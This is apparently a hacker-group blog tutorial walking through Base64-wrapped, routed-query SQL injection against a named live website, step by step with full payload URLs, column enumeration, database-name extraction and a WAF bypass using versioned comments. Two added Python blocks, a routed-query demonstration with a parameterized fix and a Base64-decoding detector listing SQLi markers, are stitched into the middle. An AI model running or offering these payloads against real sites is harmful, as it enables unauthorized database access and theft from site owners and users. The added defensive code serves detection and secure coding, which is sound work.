SQLi With Routed Query And Base64 (Encode, Decode)

Less 7: SQLi With Routed Query And Base64 (Encode, Decode)

Tutorials by Team Hind and CyberSecuritySquad

Intro about me:
Name:                               Navdeep Singh
Facebook ID:                        https://www.facebook.com/navdeep.dhukia.5
Facebook official page (CSS):       https://www.facebook.com/BlackHatHackers555
Facebook official page (Team Hind): https://www.facebook.com/TeamHind/
Website:                            http://www.securitykiller.org

Requirement:
1. Modified HackBar (HackBar Pro). I left a download link under the video.

Step 1. First check whether this site is vulnerable or not.
I have a site: http://creativeitsoft.net/page.php?mn=Vk9JUCBBcHBsaWNhdGlvbg==&sb=TGV2ZWwgNCBCaWxsaW5n

Step 2. On this website the id is encoded in Base64, so first decode it (TGV2ZWwgNCBCaWxsaW5n), like in my video.
After decoding, it becomes (Level 4 Billing).
We will add a single quote (') after it: ?sb=Level 4 Billing'
Like this: http://creativeitsoft.net/page.php?mn=Vk9JUCBBcHBsaWNhdGlvbg==&sb=Level 4 Billing'
Now encode it into Base64 again (Level 4 Billing').
Now the URL is: http://creativeitsoft.net/page.php?mn=Vk9JUCBBcHBsaWNhdGlvbg==&sb=TGV2ZWwgNCBCaWxsaW5nJw==
Hit Enter.

Step 3. After adding the single quote ('), if the site shows a SQL error or hides data on the page, that means it is vulnerable.

Step 4. Start the operation on the URL. Now we will count the total number of columns in information_schema.
We will use an ORDER BY query to count the columns.
So decode this value again (TGV2ZWwgNCBCaWxsaW5nJw==) and add order by.
Like this: http://creativeitsoft.net/page.php?mn=Vk9JUCBBcHBsaWNhdGlvbg==&sb=Level 4 Billing' order by 100-- -
Now encode the whole value into Base64 again (Level 4 Billing' order by 100-- -).

Now the URL looks like this: http://creativeitsoft.net/page.php?mn=Vk9JUCBBcHBsaWNhdGlvbg==&sb=TGV2ZWwgNCBCaWxsaW5nJyBvcmRlciBieSAxMDAtLSAt

Error: the number of columns is under 100. Here there are 5 columns.

Now I select order by 5 columns:
http://creativeitsoft.net/page.php?mn=Vk9JUCBBcHBsaWNhdGlvbg==&sb=TGV2ZWwgNCBCaWxsaW5nJyBvcmRlciBieSA1LS0gLQ==

Here the total number of columns is 5, because at 6 there is an error.

Step 5. Now I am going to use the UNION command to check for vulnerable columns.
Like this: http://creativeitsoft.net/page.php?mn=Vk9JUCBBcHBsaWNhdGlvbg==&sb=Level 4 Billing' UNION SELECT 1,2,3,4,5-- -
Now encode it, like this: http://creativeitsoft.net/page.php?mn=Vk9JUCBBcHBsaWNhdGlvbg==&sb=TGV2ZWwgNCBCaWxsaW5nJyBVTklPTiBTRUxFQ1QgMSwyLDMsNCw1LS0gLQ==

It is not showing any vulnerable columns, so now try a routed query, like this:
http://creativeitsoft.net/page.php?mn=Vk9JUCBBcHBsaWNhdGlvbg==&sb=Level 4 Billing' and 0 UNION SELECT "1' order by 12-- -",2,3,4,5-- -

Now encode it into Base64, like this:
http://creativeitsoft.net/page.php?mn=Vk9JUCBBcHBsaWNhdGlvbg==&sb=TGV2ZWwgNCBCaWxsaW5nJyBhbmQgMCBVTklPTiBTRUxFQ1QgIjEnIG9yZGVyIGJ5IDEyLS0gLSIsMiwzLDQsNS0tIC0=

Step 6. Now use UNION SELECT, like this:
http://creativeitsoft.net/page.php?mn=Vk9JUCBBcHBsaWNhdGlvbg==&sb=Level 4 Billing' and 0 UNION SELECT "1' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12-- -",2,3,4,5-- -
Now encode it:
http://creativeitsoft.net/page.php?mn=Vk9JUCBBcHBsaWNhdGlvbg==&sb=TGV2ZWwgNCBCaWxsaW5nJyBhbmQgMCBVTklPTiBTRUxFQ1QgIjEnIFVOSU9OIFNFTEVDVCAxLDIsMyw0LDUsNiw3LDgsOSwxMCwxMSwxMi0tIC0iLDIsMyw0LDUtLSAt

We got the vulnerable column, which is (8).
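
Why a routed query works at all, seen from the server side, as an added example (not code from this tutorial or from the site): the value returned by a first query is concatenated into a second query, so text the first query was made to return is parsed as SQL by the second. The SQLite schema, the function names and the ROUTED marker are assumptions for illustration; binding parameters in both queries removes the problem.

```python
import sqlite3

def make_db():
    # Constructed in-memory stand-in for the tables behind the page's two queries.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE pages(id TEXT, slug TEXT);
        CREATE TABLE content(page_id TEXT, title TEXT);
        INSERT INTO pages VALUES ('1', 'Level 4 Billing');
        INSERT INTO content VALUES ('1', 'Billing overview');
    """)
    return db

def lookup_vulnerable(db, slug):
    # Query 1: the request value is concatenated into SQL.
    row = db.execute(f"SELECT id FROM pages WHERE slug = '{slug}'").fetchone()
    if row is None:
        return []
    # Query 2: the value read back from query 1 is trusted and concatenated again.
    rows = db.execute(f"SELECT title FROM content WHERE page_id = '{row[0]}'")
    return [r[0] for r in rows]

def lookup_hardened(db, slug):
    # Both queries bind their input, including the value that came from query 1.
    row = db.execute("SELECT id FROM pages WHERE slug = ?", (slug,)).fetchone()
    if row is None:
        return []
    rows = db.execute("SELECT title FROM content WHERE page_id = ?", (row[0],))
    return [r[0] for r in rows]

# Constructed input: query 1 returns the inner text as its "id", query 2 then parses it.
PROBE = "x' UNION SELECT '0'' UNION SELECT ''ROUTED''-- -"

if __name__ == "__main__":
    db = make_db()
    print(lookup_vulnerable(db, "Level 4 Billing"))  # normal lookup
    print(lookup_vulnerable(db, PROBE))              # second query runs routed SQL
    print(lookup_hardened(db, PROBE))                # treated as data, no rows
```

The column counts differ between the two stages on this page (5, then 12) for the same reason: each count belongs to a different query.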

Step 7. Now I print the database name and version.
Database:
http://creativeitsoft.net/page.php?mn=Vk9JUCBBcHBsaWNhdGlvbg==&sb=Level 4 Billing' and 0 UNION SELECT "1' UNION SELECT 1,2,3,4,5,6,7,database(),9,10,11,12-- -",2,3,4,5-- -

Now encode it, like this:
http://creativeitsoft.net/page.php?mn=Vk9JUCBBcHBsaWNhdGlvbg==&sb=TGV2ZWwgNCBCaWxsaW5nJyBhbmQgMCBVTklPTiBTRUxFQ1QgIjEnIFVOSU9OIFNFTEVDVCAxLDIsMyw0LDUsNiw3LGRhdGFiYXNlKCksOSwxMCwxMSwxMi0tIC0iLDIsMyw0LDUtLSAt

The DB is:
shopno_crtv

Step 8. Now I try to print the database and version using concat.

If I try to print using concat, the website shows an error. That means there is a WAF (mod_security) here that blocks concat, so I bypass it with (/*!50000concat*/).

Like this:
http://creativeitsoft.net/page.php?mn=Vk9JUCBBcHBsaWNhdGlvbg==&sb=Level 4 Billing' and 0 UNION SELECT "1' UNION SELECT 1,2,3,4,5,6,7,/*!50000concat*/(database(),0x3a,version()),9,10,11,12-- -",2,3,4,5-- -
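
For defenders, the Base64 wrapping used in the steps above only hides these probes from filters that inspect the raw parameter value. The added example below (not part of the original tutorial) decodes Base64-looking query parameters before matching the markers this page uses; the marker list, function names and sample requests are constructed for illustration.

```python
import base64
import re
from urllib.parse import parse_qsl, urlsplit

# Markers for the probes this tutorial walks through (not a complete SQLi ruleset).
MARKERS = {
    "dangling_quote": re.compile(r"'\s*$"),
    "order_by_probe": re.compile(r"'\s*order\s+by\s+\d+", re.I),
    "union_select": re.compile(r"union\s+select", re.I),
    "versioned_comment": re.compile(r"/\*!\d{5}"),
    "comment_tail": re.compile(r"--\s*[-+]?\s*$"),
}

def decode_b64_text(value):
    """Return the decoded text if value is Base64 of printable UTF-8, else None."""
    try:
        # '+' in Base64 arrives as a space after query-string parsing; undo that.
        raw = base64.b64decode(value.replace(" ", "+"), validate=True)
        text = raw.decode("utf-8")
    except ValueError:  # covers binascii.Error and UnicodeDecodeError
        return None
    return text if text.isprintable() else None

def scan_request(url):
    """Return {parameter: [marker, ...]} over raw and Base64-decoded query values."""
    findings = {}
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        views = [value, decode_b64_text(value) or ""]
        hits = sorted(m for m, rx in MARKERS.items() if any(rx.search(v) for v in views))
        if hits:
            findings[name] = hits
    return findings

def sample_url(sb):
    # Constructed request; path and parameter names mirror the page, encoded at run time.
    enc = lambda s: base64.b64encode(s.encode()).decode()
    return "/page.php?mn=" + enc("VOIP Application") + "&sb=" + enc(sb)

SAMPLES = [  # constructed inputs built from values shown on this page
    sample_url("Level 4 Billing"),
    sample_url("Level 4 Billing'"),
    sample_url("Level 4 Billing' order by 100-- -"),
    sample_url("Level 4 Billing' and 0 UNION SELECT \"1' UNION SELECT 1,2,3,4,5,6,7,"
               "/*!50000concat*/(database(),0x3a,version()),9,10,11,12-- -\",2,3,4,5-- -"),
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(scan_request(s) or "clean")
```

The same decode-then-inspect step belongs in any WAF or log pipeline in front of an application that accepts encoded parameters; the lasting fix is still parameterized queries in the application.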

I think you understand. All the next steps are the same as simple union-based injection, like Less 1.


 We Are:- | VIKYP | INDCYBERJOCKER |  In73ct0r d3vil | Navdeep Singh | CYBA TIGER | ANONFIGHTER | Mr.Hex | GHOSTF133T | VINEET RV | Hacker Ritz | SNIPER |

Reviewed by Unknown on 12/09/2015 Rating: 5